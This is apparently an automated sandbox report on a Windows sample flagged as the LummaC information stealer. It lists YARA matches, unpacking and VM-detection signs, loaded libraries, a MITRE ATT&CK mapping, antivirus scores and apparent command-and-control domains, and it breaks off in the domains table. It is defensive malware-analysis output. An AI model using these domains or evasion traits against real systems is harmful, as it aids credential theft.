      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0074F5970_2_0074F597
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007185970_2_00718597
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007145870_2_00714587
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007216F60_2_007216F6
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007356940_2_00735694
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007346870_2_00734687
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007327770_2_00732777
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007477670_2_00747767
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007177570_2_00717757
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007197E70_2_007197E7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007278060_2_00727806
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007169770_2_00716977
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007369370_2_00736937
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007389270_2_00738927
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0071A9E70_2_0071A9E7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0074F9870_2_0074F987
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00748A770_2_00748A77
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0072EA270_2_0072EA27
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00729A290_2_00729A29
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00718AB70_2_00718AB7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00731B070_2_00731B07
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00715BF70_2_00715BF7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00713BD70_2_00713BD7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00740BA70_2_00740BA7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00730BA00_2_00730BA0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0071EC770_2_0071EC77
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0073CCB00_2_0073CCB0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0073DCBC0_2_0073DCBC
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0073CD780_2_0073CD78
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00746D6F0_2_00746D6F
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0073CD370_2_0073CD37
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0073CD890_2_0073CD89
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0072CE630_2_0072CE63
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0072DE670_2_0072DE67
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0071DE400_2_0071DE40
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0073AEF70_2_0073AEF7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0072FEDC0_2_0072FEDC
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00726F350_2_00726F35
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0074EF070_2_0074EF07
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0071CFAD0_2_0071CFAD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: String function: 00724667 appears 65 times
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: String function: 00408030 appears 42 times
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: String function: 00414400 appears 65 times
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: String function: 00718297 appears 72 times
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 660
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1372609162.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesDefence: vs NQbg5Ht2hW.exe
      Source: NQbg5Ht2hW.exe, 00000000.00000000.1363831661.000000000044B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesDefence: vs NQbg5Ht2hW.exe
      Source: NQbg5Ht2hW.exeBinary or memory string: OriginalFilenamesDefence: vs NQbg5Ht2hW.exe
      Source: NQbg5Ht2hW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: NQbg5Ht2hW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@11/2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004707A6 CreateToolhelp32Snapshot,Module32First,0_2_004707A6
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00430C70 CoCreateInstance,0_2_00430C70
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3440
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\c89904e0-05a0-4b61-8eb5-ada27a915b3dJump to behavior
      Source: NQbg5Ht2hW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: NQbg5Ht2hW.exeVirustotal: Detection: 41%
      Source: NQbg5Ht2hW.exeReversingLabs: Detection: 57%
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeFile read: C:\Users\user\Desktop\NQbg5Ht2hW.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\NQbg5Ht2hW.exe "C:\Users\user\Desktop\NQbg5Ht2hW.exe"
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 660
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeUnpacked PE file: 0.2.NQbg5Ht2hW.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeUnpacked PE file: 0.2.NQbg5Ht2hW.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh0_2_0043D812
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00443469 push ebp; iretd 0_2_0044346C
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0044366E push 9F00CD97h; ret 0_2_004436B1
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h0_2_0043AE3E
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004477A5 push ebp; iretd 0_2_004477AA
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0047582A push ss; retf 0_2_0047589B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004758AD push ss; retf 0_2_0047589B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004714DC push 00000039h; ret 0_2_004715B3
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00473480 push ebp; ret 0_2_00473483
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00471545 push 00000039h; ret 0_2_004715B3
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0047156B push 00000039h; ret 0_2_004715B3
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0074B097 push eax; mov dword ptr [esp], 1D1E1F10h0_2_0074B0A5
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0074DA77 push eax; mov dword ptr [esp], 707F7E0Dh0_2_0074DA79
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00733A79 push esp; iretd 0_2_00733A7C
      Source: NQbg5Ht2hW.exeStatic PE information: section name: .text entropy: 7.796934543809841
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe TID: 3200Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe TID: 3200Thread sleep time: -30000s >= -30000sJump to behavior
      Source: Amcache.hve.4.drBinary or memory string: VMware
      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1445194070.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716905313.000000000068D000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453014795.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716705757.000000000063A000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.4.drBinary or memory string: vmci.sys
      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.4.drBinary or memory string: VMware20,1
      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
      Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043C1F0 LdrInitializeThunk,0_2_0043C1F0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00470083 push dword ptr fs:[00000030h]0_2_00470083
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0071092B mov eax, dword ptr fs:[00000030h]0_2_0071092B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00710D90 mov eax, dword ptr fs:[00000030h]0_2_00710D90

      HIPS / PFW / Operating System Protection Evasion

      barindex
      LummaC encrypted strings found
      Source: NQbg5Ht2hW.exeString found in binary or memory: rapeflowwj.lat
      Source: NQbg5Ht2hW.exeString found in binary or memory: crosshuaht.lat
      Source: NQbg5Ht2hW.exeString found in binary or memory: sustainskelet.lat
      Source: NQbg5Ht2hW.exeString found in binary or memory: aspecteirs.lat
      Source: NQbg5Ht2hW.exeString found in binary or memory: energyaffai.lat
      Source: NQbg5Ht2hW.exeString found in binary or memory: necklacebudi.lat
      Source: NQbg5Ht2hW.exeString found in binary or memory: discokeyus.lat
      Source: NQbg5Ht2hW.exeString found in binary or memory: grannyejh.lat
      Source: NQbg5Ht2hW.exeString found in binary or memory: sweepyribs.lat
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      PowerShell      		1
      DLL Side-Loading      		1
      Process Injection      		1
      Virtualization/Sandbox Evasion      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Process Injection      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol2
      Clipboard Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Deobfuscate/Decode Files or Information      		Security Account Manager1
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
      Obfuscated Files or Information      		NTDS2
      System Information Discovery      		Distributed Component Object ModelInput Capture114
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
      Software Packing      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      NQbg5Ht2hW.exe42%VirustotalBrowse
      NQbg5Ht2hW.exe58%ReversingLabsWin32.Trojan.CrypterX
      NQbg5Ht2hW.exe100%AviraHEUR/AGEN.1306978
      NQbg5Ht2hW.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      sustainskelet.lat0%URL Reputationsafe
      crosshuaht.lat0%URL Reputationsafe
      necklacebudi.lat0%URL Reputationsafe

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      steamcommunity.com
      		23.55.153.106
      		truefalse
        		high
        lev-tolstoi.com
        		172.67.157.254
        		truefalse
          		high
          sustainskelet.lat
          		unknown
          		unknowntrue
          • 0%, URL Reputation
          		unknown
          crosshuaht.lat
          		unknown
          		unknowntrue
